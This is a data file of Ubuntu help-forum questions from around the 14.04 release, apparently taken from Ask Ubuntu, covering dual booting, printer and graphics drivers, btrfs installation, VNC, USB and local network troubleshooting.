457767	install ubuntu on macbook , two separate hdd , choose os to boot by holidng alt	mid 2010 macbook pro swapped hdd for ssd swapped dvd for hdd i do n't want to install refit or anything like that . so is there a way i can keep mac os x on my primary ssd and install ubuntu 14.04 on secondary hdd ( instead of dvd drive ) and just press alt-option button whenever i boot so i can choose which hard drive and which os to boot ?
457768	anyone have canon mf4890dw with cndrvcups 2.80 working on ubuntu 14.04 ?	i recently upgraded to 14.04 with cndrvcups-common and cndrvcups-ufr2-us 2.80-1 . when i print a test page or pdf from evince ( and presumable other print modes as well ) , /usr/bin/cnpkmoduleufr2 cpu use goes to 100 % until killed ( at least 15 minutes ) . this used to work in 13.10 with 2.70 . ( i suspect this is a problem with the driver and has nothing to do with the ubuntu upgrade . ) strace shows apparently endless repeated lines like this : read ( 7 , `` '' , 4 ) = 0 read ( 7 , `` '' , 4 ) = 0 read ( 7 , `` '' , 4 ) = 0 ... before i invest time on trying to recompile cndrvcups from scratch ... does anyone have this working or at least have the same symptoms ? -reece
457770	3m ergo mouse wheel scrolling 14.04	i hope someone can help with this . previously in ubuntu 12 i was able to follow these instructions to get my mouse wheel to work . in 14.04 , the hal-* functions no longer work and i can not seem to find a replacement . this poster tried , but the reply there only works if you know the path on ubuntu from what i understand . i basically would like to add this : section `` inputclass '' identifier `` middle mouse button scrolling '' matchproduct `` areson usb device '' matchdevicepath `` /dev/input/event* '' option `` emulatewheel '' `` true '' option `` emulatewheelbutton '' `` 2 '' option `` xaxismapping '' `` 6 7 '' option `` yaxismapping '' `` 4 5 '' endsection here /usr/share/x11/xorg.conf.d/ but i need to be able to fill in the `` matchproduct '' field with the device name as installed . thank you very much for any help or suggestions you might have !
457771	ubunutu does n't recognize 3rd monitor	i just installed ubunutu 14.04 , after the experimentation i did with previous version on virtual machines went smoothly . i have 3 monitors - 2 connected to pci-e graphic card ( via dvi and hdmi ) , and 1 connected directly to the motherboard via dvi . when i finished the installation of the operation system , it recognized all 3 monitors , but it seems they were all considered as 1 , since i could n't extend the display , and the resolution was limited ( they just showed the same picture as if they were one monitor ) . so i thought that i may be missing drivers ... i went to amd website to get drivers for my external graphic card ( the one with the 2 monitors connected ) , which is a radeon hd 5670.. i found the drivers on amd.com after i could n't find linux-compatible drivers on gigabyte.com ( which is my graphic card 's manufacturer ) . i grabbed the driver from amd.com , installed it , and it worked just fine , but only for my 2 monitors connected to that graphic card , but the 3rd monitor connected to the motherboard ( gigabyte ga-h67a-ud3h ) , is now black , and it does n't show up on the ubunutu 's display settings at all . i could n't find any solution or idea to what 's the problem is , searching the web.. all i could find is people with 2 monitors\1 graphic card which is not recognized well.. what can i do ?
457773	issues while installing ubuntu 14.04 on hp laptop nx 5000	i need some help . the installation went fine but when restarted i get the following message serious error were found while checking the disk drive for / . i select option m for manual recovery and it says root file system check failed . what can i do ? thanks
457774	driver canon lbp 2900	how to install driver for canon lbp 2900 printer in ubuntu 14.04 ? i already tryed to instal drivers from official canon support and from other answers on ask ubuntu but so far no results .
457777	can xfreerdp connect to a server 2012 connection broker ?	we have a server 2012 connection broker setup and i have read that there is a `` /load-balance-info '' parameter that it has which is required for the broker however when i look at the options in ubuntu it does n't show it . does ubuntu 's build of freerdp have support for connection brokers ? thanks !
457778	installing 14.04 server to exisiting btrfs subvolume	i have an existing btrfs raid1 volume consisting of 4 disks . this already contains a few subvolumes of which i 'm looking to install ubuntu to one of . i 've done the following : mount -o subvolid=0 /dev/sda1 /btrfsroot btrfs subvol create rootsfs /btrfsroot btrfs subvol set-default 376 /btrfsroot mount /dev/sda1 /rootfs ( to ensure i 've set the correct id ) the installer crashes out after the partitioner though ( saying it ca n't remove needed files from /target/ ) . i 've set it to use partition /dev/sda1 as btrfs on / without formatting . i 've done a fair bit of research but at first glance it 's hard to tell what the best practice is with regards installing ubuntu into an existing btrfs subvolume . i 've also tried : not partitioning /dev/sd [ a-d ] at all and adding those to the btrfs volume . when i install in this manner it kind of works ( i have to manually mount /dev/sda to /target/ ) but then i get stuck at a grub debug shell on reboot partitioning off 100 meg off ( as /dev/sda1 ) each disk and creating an mdadm array to use as /boot/ ( with btrfs partitions as /dev/s [ a-d ] 2 ) . again the installer crashes after partitioning saying it could not delete needed files from /target/ though nothing is there . i 've read the info here and i 'm guessing i 'm running into the problems they mention there about set-default breaking ubuntu 's layout . though my interpretation was that that is only an issue after install - i ca n't even get that far . what is the best practice here ? my reason for wanting to install onto a separate subvolume is to keep my ubuntu install distinct from everything else on the drives . is it safe to do an install into the root-subvolume without risking nuking my data ?
457780	update on ubuntu 14.04 `` e : some index files failed to download . they have been ignored , or old ones used instead . ''	i called sudo apt-get update , i got something like this err http : //ppa.launchpad.net trusty/main i386 packages 404 not found this err http : //ppa.launchpad.net trusty/main i386 packages 404 not found and this is what the last line look like w : failed to fetch http : //ppa.launchpad.net/marlin-devs/marlin-daily/ubuntu/dists/trusty/main/binary-i386/packages 404 not found w : failed to fetch http : //ppa.launchpad.net/tiheum/equinox/ubuntu/dists/trusty/main/binary-i386/packages 404 not found e : some index files failed to download . they have been ignored , or old ones used instead . so , anyone can help me ? ? fyi , this is from ubuntu 14.04
457781	ubuntu 14.04 drops wireless at regular intervals	i have just upgraded to 14.04 and it seems to disconnect wireless after a short interval . there seems to be no way to reconnect other than re-boot the thinkpad . other devices in the same room remain wirelessly connected . running 13.10 presented no problems at all . any solutions gratefully received .
457782	booting into chrome os after ubuntu is default	so , i have successfully loaded chrubuntu 14.04 on my chromebook and managed to set it as the default . however , i have a need to access the chrome os , and i do n't know to boot back into chrome . i can only seem to find directions on how to make ubuntu the default . thanks and cheers , ed
457785	facebook & twitter blog software ?	can any one list softwares similar to widget in kde of facebook , which when placed at desktop , refreshes with new posts every second ? i installed gwibber via terminal but later i did n't find it on unity neither from terminal . $ gwibber : command not found
457786	ca n't access bios or boot windows ( samsung np300e5c , uefi install to external hdd )	before anyone bash/trolls me let me admit first that i 'm a total noob to linux . i was looking into getting into it but apparently i jumped into the deep end of a foreign pool so to speak . i will need help as if i were 5 . please do n't shun me off i 'm really trying to learn my way around linux . i do offer this information : samsung np300e5c laptop http : //paste.ubuntu.com/7360035/ the story : i had windows 7 and 8 on an internal hdd . installed ubuntu & zorin to an external . i ca n't : access bios , boot from cd , boot to my internal ( windows ) hdd i can : boot ubuntu , boot zorin , have access to a different windows pc short term goal : fix / gain access to windows , or flash my bios so that i may boot from cd or flash drive ( i 'd prefer the first and i ca n't use flashrom for a laptop ) end goal : four different os 's total on 2 different hdds dual boot windows 7 & 8 ( bootloader , menu , os selector ... whatever ) on my internal hard drive dual boot ubuntu ( non-live ) and zorin ( also non-live ) on an external hard drive all os 's falling under one windows loader list if there is anything i 'm missing that can help anyone figure out how please let me know . thanks in advanced to anyone who helps .
457787	vnc gray screen problem	i just upgraded to lubuntu 14.04 and now i 'm having vnc connection problems . at first i was getting `` connection closed unexpectedly '' but then i modified the .vnc/xstartup file based on several tutorials online , and got it to open . now it only opens with a gray screen . depending on which xstartup file i use the screen is either a tight patterned gray ( sort of like tiny houndstooth ) or else a flat , matte , solid gray . but that 's as far as i 've gotten . i remember struggling with this same issue when i installed lubuntu and kept my old xstartup files , but they are not working either . it 's either no connection or else a gray screen . i 'd ideally like the vnc screen to look identical to the desktop i get when i log in directly at the computer -- same bookmarks , toolbars , etc . i currently am using a very short xstartup file : xrdb $ home/.xresources xsetroot -solid grey export xkl_xmodmap_disable=1 /etc/x11/xsession if anyone can help i would be very appreciative . i have spent about 2 hours so far trying different xstartup files and feel like maybe i 'm barking up the wrong tree , but it was nice to go from no connection to a gray screen . i feel like i should be almost there . thank you .
457788	what 's the difference between system shell and login shell ?	i recently encountered that my /bin/sh is a symlink to dash , which is apparently default system shell for ubuntu since its 6.10 release . i did n't know system shell is different from login shell . i can intuitively guess what the role of system shell should be , but i 'm looking for more precise definition of what a system shell is and how does it differ from login shell .
457790	window themes not getting applied	i downloaded tweak tool changing window theme does n't change anything but changing from appearance changes . why is it so ? has the default theme directory changed from /usr/share/themes ? tweak tool doesnt work for unity ? how to install new ( metacity , gtk3 ) themes downloaded from gnome-look.org ?
457791	create keyboard shortcuts for certain symbols ( logical operators )	( using ubuntu 12.04 ) currently i 'm dealing a lot with logic ( not for computer science , though ) , so my idea was to create specific shortcuts on my keyboard for easy typing . my idea is to use ctrl + the left windows-logo key ( super ) and then a specific key . e.g . when i type ctrl + win-key + v in a text editor or chat-program , or whatever , i want it to type the logical operator for `` or '' : ∨ ctrl + win-key + ^ i want it to become the logical operator `` and '' : ∧ ctrl + win-key + 0 i want it to become ≠ ctrl + win-key + e i want it to become ∃ ctrl + win-key + m i want it to become the modal operator for `` possible '' : ◊ and so on , and so on . you get the idea . instructions would be much appreciated !
457792	ca n't install via usb stick	i 'm installing the latest version but it says that files is unable to copy on harddisk due to usb is burned too fast it gives this error in between of the installation i can try it but ca n't install it . please help
457796	how to enable port persist for a usb to serial com port	i am followed this guide ( http : //www.zedboard.org/sites/default/files/documentations/gs-aes-z7ev-7z020-g-v7.pdf ) for working with a soc board in windows . i would like to switch to working under ubuntu but have the annoying problem that putty keeps closing every time the board is reprogrammed or turned off . this is using a usb to serial driver . the port persist under windows makes it seem like the port is still there and open ( i guess ) and also makes sure that when the board does come back on that it is assigned the same com port . in windows you have to go to the device manager and open the properties menu of the ports . you then click on the advanced button and select a check box to enable port persist . how would i do something similar under ubuntu ? thanks .
457799	dual monitor flickering in ubuntu 12.04 with ati	this question might have been asked before but the solution posted there do n't work for me . i have a laptop with the usual vga output for a second monitor . on windows i had no problem with connecting the second monitor but on ubuntu 12.04 when i do it they start flickering like hell and i ca n't do anything ( click , drag , open windows ) . i have installed the ati driver ( by following these instructions : installing the amd/ati catalyst drivers for 12.04 lts ) and everything goes well on the laptop 's monitor . i do n't know if it is the driver or the system . i tried this solution and several xrandr changes but it does n't work . my card is amd radeon hd 7600m series and the second monitor is a 19 '' acer . i ca n't believe that at this stage we have this kind of issues with something that should work without problems . sticking to ubuntu is a great challenge for me every day .
457801	getting two usb devices to run on different buses	my objective is to get two webcams streaming simultaneously on my computer . because of bandwidth limitations of the uvcvideo driver ( or see bottom of uvc faq ) , i need the two webcams to be on different buses . however , try as i might , no matter which ports i plug my usb webcams into , they both run on bus 01 . likewise , my usb mouse always runs on bus 03 . output of lspci | grep -i usb 00:1d.0 usb controller : intel corporation 631xesb/632xesb/3100 chipset uhci usb controller # 1 ( rev 09 ) 00:1d.1 usb controller : intel corporation 631xesb/632xesb/3100 chipset uhci usb controller # 2 ( rev 09 ) 00:1d.2 usb controller : intel corporation 631xesb/632xesb/3100 chipset uhci usb controller # 3 ( rev 09 ) 00:1d.3 usb controller : intel corporation 631xesb/632xesb/3100 chipset uhci usb controller # 4 ( rev 09 ) 00:1d.7 usb controller : intel corporation 631xesb/632xesb/3100 chipset ehci usb2 controller ( rev 09 ) output of lsusb with nothing plugged in : bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 005 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 004 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 003 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 002 device 001 : id 1d6b:0001 linux foundation 1.1 root hub output of lsusb with a mouse and one webcam plugged in : bus 001 device 011 : id 046d:0843 logitech , inc . bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 005 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 004 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 003 device 005 : id 093a:2510 pixart imaging , inc. optical mouse bus 003 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 002 device 001 : id 1d6b:0001 linux foundation 1.1 root hub output of lsusb with a webcam plugged in where the mouse was : bus 001 device 012 : id 045e:076f microsoft corp . bus 001 device 011 : id 046d:0843 logitech , inc . bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 005 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 004 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 003 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 002 device 001 : id 1d6b:0001 linux foundation 1.1 root hub how can i get my webcams to operate on different usb buses ?
457802	facing configuration error while installing from source	i downloaded vlc source vlc-2.0.6.tar.xz from sourceforge . while compiling by ./configure , it gives following error : configure : error : could not find libmad on your system : you may get it from http : //www.underbit.com/products/mad/ . alternatively you can use -- disable-mad to disable the mad plugin . after retrying ./configure -- -- disable-mad further errors : no package 'libavutil ' found . pass -- disable-avcodec to ignore this error . and so on . how to solve this ? should i disable continuously with -- disable ? how solve such configure error . this question is not limited to vlc but widely i going to install package from source .
457804	how to choose libreoffice paper size ?	is there this ability to make your page size a3 or a1 like microsoft word in libreoffice ? or any way to choose your own page size in libreoffice ?
457806	change install path in gambas	i am writing an application in gambas for inclusion in the software center in ubuntu . i just got told that the only thing missing in my application , is that it should install into /opt/whatever . unfortunately , i can not seem to find out how to change that path in gambas . does anyone know how ? rasmus
457810	unstable network connection realtek rtl 8111	i have recently done fresh installs of 12.04 on two nearly identical machines . they both have the same network interfaces , realtek 8111/8168 . both worked flawlessly with my previous version of ubuntu . now , one of the servers randomly loses the network connection and then regains it after some period of time with no intervention from me . i 've swapped cables , router ports and verified it is the server not a windows client by confirming the problem on multiple windows machines . my knowledge of ubuntu is minimal so i 'm asking for some guidance as i have this machine completely set up as a web server with numerous virtual sites and a lot of mysql data and i would like to prevent re-building it . fwiw , the virtual sites always work on the server so i know the problem is n't with apache . thanks , -dmd-
457811	after ubuntu 14.04 install error with tmp/ files	when i install ubuntu as desktop ( as a dual boot , like a program on windows ) , the whole process completes but when after finishing an install my laptop restarts , the launcher wo n't run and i get a dos-like system : just a black screen with commands . something with tmp/ and an error that it wo n't mount .
457815	how can i run a sh script targeting x11-settings on login ?	the gui-based controls for mouse acceleration do not suffice to tame my mouse , so i am correcting this by running : xinput set-prop 10 `` device accel constant deceleration '' 2.9 this script has the desired effect ( every time ) when run manually from the terminal . however i have yet to find a way to run it on each login . attempts to have it execute through rc.local or using the script launching options in the system settings have both remained fruitless . do you have any suggestions of what else i could try ? should i modify x11 config files directly ? several posts related to this topic advised against doing so .
457819	defective package uninstalled some apps from ubuntu	i have downloaded a package gametreelinux , which i tried to install but failed . it uninstalled the ubuntu software center , system settings , and maybe other things too . how do i restore these ? ( i 've already re-installed ubuntu software center . )
457821	why can a system admin not mount ipod while nonadmin can ?	i can connect my ipod touch 4th generation ( running ios 6 ) to my ubuntu 12.04 , but i get this lockdown error as it tries to mount the device when i 'm logged in as an admin . but it mounts just fine when logged in as a user who 's not an admin . why would that happen ? extra info : my ipod nano 5th generation mounts fine when admin is the user logged in .
457825	flash player works on firefox , but not on chromium ?	i want to play online games , and other online stuff that requires flash player on the internet . flash player works just fine under firefox , but in chromium i just get a blank page . i do n't know what is the exact problem or know to fix it .
457827	ubuntu wakes up automatically after suspending	i 'm having this problem since ubuntu 12.10/13.04 i think , now i have 14.04 and the problem stills . when i click the suspend button , the ubuntu suspends normaly but after 1 or 2 seconds it turns on automatically . but sometimes it realy suspends , but it 's rarely . i 've been searching a lot ( since i have this problem ) but seems there is n't much information about it . what can i do to fix it ? it 's kinda annoying . thanks
457836	dvd on ubuntu 14.04 lts not found	when i put a dvd into my computer 's drive it can not be found or played by fluendo player . what do i have to do to see dvd movies on my new ubuntu 14.04 ? thanks for your quick answers ! frank
457839	drivers for ati 3000 graphics	i am currently using a system with integrated mother board graphics of radeon 3000 graphics , and i am facing a severe problem of ubuntu 's incompatibility with 3d graphics on chrome . for example , chrome web store apps like biodigital human 3d . when i launch the app it first checks the compatibility and says as follows : biodigital human looks like your computer does n't support the 3d graphics required by the human . it 's probably because it 's built using webgl , which requires a newer computer . if you 'd like updates as we continue improving the system , please join our email list . you can also learn more about your options and the technical requirements here when i was using windows 7 on this computer the app was supported . is there any driver missing in my system ? i think it 's all about the drivers can anyone help me to get rid of this problem please ?
457843	how do i enable os x style 2 finger scolling in dell latitude 6430u ?	i 've got a dell latitude 6430u running trusty . i can enable 2 finger scrolling , but it 's a bizarre mode where if i put one finger down i can scroll with the other . i would like to have os x style two finger scrolling , where dragging two fingers up or down the touchpad scrolls . this apparently works on this model in windows , so i assume it can be done in ubuntu . my friend 's thinkpad x230 does proper osx-style scrolling so i am wondering if this is a driver specific issue or a configuration issue ? two finger scrolling does work , it just behaves differently than on other laptops . any notions ?
457846	/etc/rc0.d script not allowed to finish	i have a script that i 've written that needs to run during shutdown which brings down my vagrant instance . the script runs without issue , and i echo output to stdout ( and to a file ) of the process . the script outputs the following : shutting down vagrant == > default : attempting graceful shutdown of vm ... vagrant shut down however , when this runs from a computer shutdown ( rc0 ) or reboot ( rc6 ) , the terminal logs the first two lines and then moves on without shutting down vagrant .
457848	failed to install gnome on ubunto	i followed this tutorial : http : //www.filiwiese.com/installing-gnome-on-ubuntu-12-04-precise-pangolin/ and i before i rebooted my system i closed the terminal when he was like this : http : //s18.postimg.org/chrcj1b7t/screenshot_from_2014_04_29_20_42_43.png and one more thing , after i restarted my computer before ubunto was up a line of error appeared on the screen didnt had the time to read exactly what it said . any suggestions ? thanks ! p.s my version of ubunto is 14.04lts
457850	x server does n't work on ubuntu 14.04 . what may be happening ?	this how i used to setup my x server on ubuntu 13. apt-get update apt-get upgrade # nvidia apt-get -y install nvidia-current apt-get -y install nvidia-current-updates # x server apt-get -y install xserver-xorg apt-get -y install x11-xserver-utils export display=localhost:0.0 x :0 & xhost + on ubuntu 14 , i am getting the following error when i do x :0 : [ 3491.124 ] ( ii ) module wfb : vendor= '' x.org foundation '' [ 3491.124 ] compiled for 1.15.1 , module version = 1.0.0 [ 3491.124 ] abi class : x.org ansi c emulation , version 0.4 [ 3491.124 ] ( ii ) loading sub module `` ramdac '' [ 3491.124 ] ( ii ) loadmodule : `` ramdac '' [ 3491.124 ] ( ii ) module `` ramdac '' already built-in [ 3491.125 ] ( ** ) nvidia ( 0 ) : depth 24 , ( -- ) framebuffer bpp 32 [ 3491.125 ] ( == ) nvidia ( 0 ) : rgb weight 888 [ 3491.125 ] ( == ) nvidia ( 0 ) : default visual is truecolor [ 3491.125 ] ( == ) nvidia ( 0 ) : using gamma correction ( 1.0 , 1.0 , 1.0 ) [ 3491.125 ] ( ** ) nvidia ( 0 ) : enabling 2d acceleration [ 3491.569 ] ( ii ) nvidia ( 0 ) : nvidia gpu geforce gtx 650 ti ( gk106 ) at pci:1:0:0 ( gpu-0 ) [ 3491.569 ] ( -- ) nvidia ( 0 ) : memory : 2097152 kbytes [ 3491.569 ] ( -- ) nvidia ( 0 ) : videobios : 80.06.3c.00.11 [ 3491.569 ] ( ii ) nvidia ( 0 ) : detected pci express link width : 16x [ 3491.569 ] ( -- ) nvidia ( 0 ) : interlaced video modes are supported on this gpu [ 3491.572 ] ( -- ) nvidia ( 0 ) : valid display device ( s ) on geforce gtx 650 ti at pci:1:0:0 [ 3491.572 ] ( -- ) nvidia ( 0 ) : crt-0 [ 3491.572 ] ( -- ) nvidia ( 0 ) : dfp-0 [ 3491.572 ] ( -- ) nvidia ( 0 ) : dfp-1 [ 3491.572 ] ( -- ) nvidia ( 0 ) : crt-0 : 480.0 mhz maximum pixel clock [ 3491.572 ] ( -- ) nvidia ( 0 ) : dfp-0 : 165.0 mhz maximum pixel clock [ 3491.573 ] ( -- ) nvidia ( 0 ) : dfp-0 : internal single link tmds [ 3491.573 ] ( -- ) nvidia ( 0 ) : dfp-1 : 330.0 mhz maximum pixel clock [ 3491.573 ] ( -- ) nvidia ( 0 ) : dfp-1 : internal single link tmds [ 3491.573 ] ( ee ) nvidia ( 0 ) : failed to assign any connected display devices to x screen 0 [ 3491.598 ] ( ee ) nvidia ( 0 ) : failing initialization of x screen 0 [ 3491.782 ] ( ii ) unloadmodule : `` nvidia '' [ 3491.782 ] ( ii ) unloadsubmodule : `` wfb '' [ 3491.782 ] ( ii ) unloadsubmodule : `` fb '' [ 3491.782 ] ( ee ) screen ( s ) found , but none have a usable configuration . [ 3491.782 ] ( ee ) fatal server error : [ 3491.782 ] ( ee ) no screens found ( ee ) what else can be done ?
457857	ubuntu 14.04 calculator does not get focus when opened from keyboard shortcut	i am using a microsoft natural速 ergonomic keyboard 4000 on my ubuntu 14.04 x64 and since i upgraded from ubuntu 13.10 i noticed that the calculator application does not get focus when started from the keyboard shortcut . it gets started like the last ( not previous ) application in the stack . it gets focus when opened from dash . i do n't know what configuration output to provide . any suggestions ?
457858	wireless networking on ubuntu 14.04 : destination host unreacheable on lan	i 've been having a weird issue where i can ping only specific pcs on my lan but not others but i can connect effortlessly to the internet . the ping result for local addresses is : $ ping 192.168.1.10 ping 192.168.1.10 ( 192.168.1.10 ) 56 ( 84 ) bytes of data . from 192.168.1.30 icmp_seq=10 destination host unreachable from 192.168.1.30 icmp_seq=11 destination host unreachable from 192.168.1.30 icmp_seq=12 destination host unreachable ^c -- - 192.168.1.10 ping statistics -- - 13 packets transmitted , 0 received , +3 errors , 100 % packet loss , time 12086ms pipe 3 my ifconfig result is : eth0 link encap : ethernet hwaddr 20 : cf:30:75:4c : c1 up broadcast multicast mtu:1500 metric:1 rx packets:748 errors:0 dropped:0 overruns:0 frame:0 tx packets:628 errors:0 dropped:0 overruns:0 carrier:2 collisions:0 txqueuelen:1000 rx bytes:486220 ( 486.2 kb ) tx bytes:134384 ( 134.3 kb ) lo link encap : local loopback inet addr:127.0.0.1 mask:255.0.0.0 inet6 addr : : :1/128 scope : host up loopback running mtu:65536 metric:1 rx packets:2695 errors:0 dropped:0 overruns:0 frame:0 tx packets:2695 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:258025 ( 258.0 kb ) tx bytes:258025 ( 258.0 kb ) wlan0 link encap : ethernet hwaddr 48:5d:60:5a:53:9c inet addr:192.168.1.30 bcast:192.168.1.255 mask:255.255.255.0 inet6 addr : fe80 : :4a5d:60ff : fe5a:539c/64 scope : link inet6 addr : 2002:4f12:8714 : e472:4a5d:60ff : fe5a:539c/64 scope : global inet6 addr : 2002:4f12:8714 : e472:5108:36ff:308b:8c09/64 scope : global up broadcast running multicast mtu:1500 metric:1 rx packets:10780 errors:0 dropped:0 overruns:0 frame:0 tx packets:9290 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:5321624 ( 5.3 mb ) tx bytes:1502007 ( 1.5 mb ) and finally my nmap scan is : $ nmap -sn 192.168.1.0/24 starting nmap 6.40 ( http : //nmap.org ) at 2014-04-29 20:26 cest nmap scan report for 192.168.1.1 host is up ( 0.0085s latency ) . nmap scan report for 192.168.1.30 host is up ( 0.00016s latency ) . nmap scan report for 192.168.1.100 host is up ( 0.073s latency ) . nmap done : 256 ip addresses ( 3 hosts up ) scanned in 16.07 seconds i use this routinely to share file to my local nas which is n't visible right now and for xbmc databases and i know that pings to other wireless clients work . my arp-scan result is : sudo arp-scan -- interface=wlan0 192.168.1.0/24 interface : wlan0 , datalink type : en10mb ( ethernet ) starting arp-scan 1.8.1 with 256 hosts ( http : //www.nta-monitor.com/tools/arp-scan/ ) 192.168.1.1 44:94 : fc : ea : f6:5e ( unknown ) 192.168.1.100 cc:3a:61 : e7 : e4:91 ( unknown ) 2 packets received by filter , 0 packets dropped by kernel ending arp-scan 1.8.1 : 256 hosts scanned in 1.331 seconds ( 192.34 hosts/sec ) . 2 responded
457860	14.04 install disk not booting properly	whether i use a usb or a dvd , the install program goes directly to an ubuntu desktop with no mouse . so i added another mouse , but there are no programs , save for accessibility , network information , and the log off/exit dropdown . my ultimate goal is to create an ubuntu os on a stick , but if i ca n't get the dvd to boot properly , i 'm out of luck . at one point , on another computer , or maybe it was still within windows ( 7 ) i forget , i got the install menu off the usb , but it wo n't allow me to inistall to another usb . any suggestions ?
457861	can i use manual socks proxy for only specific sites ?	i am using socks proxy with chrome . with dconf editor , i can add ignore-host so that browser connect this hosts without proxy . now i want to do opposite of this . i mean i want to specify hosts so that browser connect only these hosts by proxy . is it possible ?
457862	perl hangs for regular users , works with sudo	i recently installed ubuntu 14.04 lts and for some reason the perl command just hangs when a regular user calls it . however , if i use sudo with it , it will work perfectly . i 'm thinking the perl program is trying to read/write something that regular users have no permissions to , but how can i be sure or figure out what ? the perl version i have is v5.18.2 and is 64bit . the reason i 'm asking is i 'm trying to run a make that apparently uses perl ( so it hangs ) , but if i run it with sudo , i do n't have permissions to write over the files the make generates . if anyone has any suggestions , i 'd greatly appreciate it . thanks ! edit : this is the output of strace perl -v. it goes on looping this chunk indefinitely . execve ( `` /apps/jas/bin/perl '' , [ `` perl '' , `` -v '' ] , [ /* 62 vars */ ] ) = 0 brk ( 0 ) = 0x7fe3c41f5000 access ( `` /etc/ld.so.nohwcap '' , f_ok ) = -1 enoent ( no such file or directory ) mmap ( null , 8192 , prot_read|prot_write , map_private|map_anonymous , -1 , 0 ) = 0x7fe3c207d000 access ( `` /etc/ld.so.preload '' , r_ok ) = -1 enoent ( no such file or directory ) open ( `` /etc/ld.so.cache '' , o_rdonly|o_cloexec ) = 3 fstat ( 3 , { st_mode=s_ifreg|0644 , st_size=87654 , ... } ) = 0 mmap ( null , 87654 , prot_read , map_private , 3 , 0 ) = 0x7fe3c2067000 close ( 3 ) = 0 access ( `` /etc/ld.so.nohwcap '' , f_ok ) = -1 enoent ( no such file or directory ) open ( `` /lib/x86_64-linux-gnu/libc.so.6 '' , o_rdonly|o_cloexec ) = 3 read ( 3 , `` \177elf\2\1\1\0\0\0\0\0\0\0\0\0\3\0 > \0\1\0\0\0\320\37\2\0\0\0\0\0 '' ... , 832 ) = 832 fstat ( 3 , { st_mode=s_ifreg|0755 , st_size=1845024 , ... } ) = 0 mmap ( null , 3953344 , prot_read|prot_exec , map_private|map_denywrite , 3 , 0 ) = 0x7fe3c1a97000 mprotect ( 0x7fe3c1c53000 , 2093056 , prot_none ) = 0 mmap ( 0x7fe3c1e52000 , 24576 , prot_read|prot_write , map_private|map_fixed|map_denywrite , 3 , 0x1bb000 ) = 0x7fe3c1e52000 mmap ( 0x7fe3c1e58000 , 17088 , prot_read|prot_write , map_private|map_fixed|map_anonymous , -1 , 0 ) = 0x7fe3c1e58000 close ( 3 ) = 0 mmap ( null , 4096 , prot_read|prot_write , map_private|map_anonymous , -1 , 0 ) = 0x7fe3c2066000 mmap ( null , 8192 , prot_read|prot_write , map_private|map_anonymous , -1 , 0 ) = 0x7fe3c2064000 arch_prctl ( arch_set_fs , 0x7fe3c2064740 ) = 0 mprotect ( 0x7fe3c1e52000 , 16384 , prot_read ) = 0 mprotect ( 0x7fe3c229d000 , 8192 , prot_read ) = 0 mprotect ( 0x7fe3c207f000 , 4096 , prot_read ) = 0 munmap ( 0x7fe3c2067000 , 87654 ) = 0 getpid ( ) = 29478 rt_sigaction ( sigchld , { 0x7fe3c2094460 , ~ [ rtmin rt_1 ] , sa_restorer , 0x7fe3c1acdff0 } , null , 8 ) = 0 geteuid ( ) = 42590 brk ( 0 ) = 0x7fe3c41f5000 brk ( 0x7fe3c4216000 ) = 0x7fe3c4216000 getppid ( ) = 29475 stat ( `` /lhome/username '' , { st_mode=s_ifdir|0755 , st_size=4096 , ... } ) = 0 stat ( `` . `` , { st_mode=s_ifdir|0755 , st_size=4096 , ... } ) = 0 open ( `` /apps/jas/bin/perl '' , o_rdonly ) = 3 fcntl ( 3 , f_dupfd , 10 ) = 10 close ( 3 ) = 0 fcntl ( 10 , f_setfd , fd_cloexec ) = 0 rt_sigaction ( sigint , null , { sig_dfl , [ ] , 0 } , 8 ) = 0 rt_sigaction ( sigint , { 0x7fe3c2094460 , ~ [ rtmin rt_1 ] , sa_restorer , 0x7fe3c1acdff0 } , null , 8 ) = 0 rt_sigaction ( sigquit , null , { sig_dfl , [ ] , 0 } , 8 ) = 0 rt_sigaction ( sigquit , { sig_dfl , ~ [ rtmin rt_1 ] , sa_restorer , 0x7fe3c1acdff0 } , null , 8 ) = 0 rt_sigaction ( sigterm , null , { sig_dfl , [ ] , 0 } , 8 ) = 0 rt_sigaction ( sigterm , { sig_dfl , ~ [ rtmin rt_1 ] , sa_restorer , 0x7fe3c1acdff0 } , null , 8 ) = 0 read ( 10 , `` # ! /bin/sh\n\ndirname=dirname $ 0\n '' ... , 8192 ) = 207 pipe ( [ 3 , 4 ] ) = 0 clone ( child_stack=0 , flags=clone_child_cleartid|clone_child_settid|sigchld , child_tidptr=0x7fe3c2064a10 ) = 29479 close ( 4 ) = 0 read ( 3 , `` /apps/jas/bin\n '' , 128 ) = 14 read ( 3 , `` '' , 128 ) = 0 -- - sigchld { si_signo=sigchld , si_code=cld_exited , si_pid=29479 , si_status=0 , si_utime=0 , si_stime=0 } -- - rt_sigreturn ( ) = 0 close ( 3 ) = 0 wait4 ( -1 , [ { wifexited ( s ) & & wexitstatus ( s ) == 0 } ] , 0 , null ) = 29479 pipe ( [ 3 , 4 ] ) = 0 clone ( child_stack=0 , flags=clone_child_cleartid|clone_child_settid|sigchld , child_tidptr=0x7fe3c2064a10 ) = 29480 close ( 4 ) = 0 read ( 3 , `` linux\n '' , 128 ) = 6 read ( 3 , `` '' , 128 ) = 0 -- - sigchld { si_signo=sigchld , si_code=cld_exited , si_pid=29480 , si_status=0 , si_utime=0 , si_stime=0 } -- - rt_sigreturn ( ) = 0 close ( 3 ) = 0 wait4 ( -1 , [ { wifexited ( s ) & & wexitstatus ( s ) == 0 } ] , 0 , null ) = 29480
457865	ubuntu does not boot , start - could not write bytes broken pipe	with holding shift i can get to recovery menu , but i have no idea how to simply reset whatever may have done this , i am considerig full reinstall however can not afford to lose files . any ideas please , i am not that skilled .
